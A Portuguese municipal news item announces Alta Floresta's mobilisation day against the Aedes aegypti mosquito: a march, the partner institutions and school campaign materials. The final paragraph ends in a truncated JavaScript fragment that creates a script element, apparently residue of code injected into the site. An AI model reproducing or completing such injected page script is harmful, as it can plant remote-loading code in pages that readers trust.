Capa / Cidades / Dia de Mobilização no Combate ao Mosquito Aedes Aegypti

Dia de Mobilização no Combate ao Mosquito Aedes Aegypti

17768Assessoria da PMAF

O município de Alta Floresta realizará nesta sexta-feira, 4 de março, o dia de Mobilização no Combate ao Mosquito Aedes aegypti, “o dia D”, a passeata terá início às 7h30 da manhã na Praça do Avião, contornando a Igreja Matriz e retornando à praça. A escolha do dia foi em virtude do calendário nacional orientado pelo Ministério da Educação (MEC).
Além das várias ações já realizadas, com o objetivo de conscientizar todos os cidadãos altaflorestenses em relação as consequências das doenças transmitidas pelo mosquito neste dia, o evento unirá diversas instituições. Além da Secretaria Municipal de Educação e de Saúde, também irão participar a Escola Municipal Professor Benjamin Pádua, o Instituto Federal de Mato Grosso (IFMT), os representantes dos Departamentos e Secretarias da prefeitura de Alta Floresta, entre outras instituições.
O plano de ações, no combate ao mosquito Aedes aegypti, continuará no município, tanto as escolas municipais de educação infantil quanto as de ensino fundamental receberão os banners informativo, faixas, e inclusive um informativo no formato de checklist para realizarem um trabalho de orientação aos alunos, que se estenderá as suas famílias, no decorrer do ano.
Por meio destas estratégias, o município cumprirá o que foi determinado no Decreto nº 0449/15, de 30 de dezembro de 2.015, como por exemplo, a definição das ações de mobilização e combate ao mosquito Aedes aegypti.
A coordenadora da Área de Ciências Naturais da Secretaria Municipal de Educação, Prof.ª Simone Aparecida Domiciano, ressaltou que “todas estas ações só serão possíveis com a parceria realizada entre as instituições, a união de forças, certamente, trará benefícios a todos que aqui moram”. Contudo, a professora ainda salientou que “é de suma importância que toda a população cuide de seus quintais, fazendo sua parte, para que as doenças não cheguem até o cidadão e aos seus familiares, destacando o slogan da campanha: “Eu e minha família combatemos este mosquito”.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top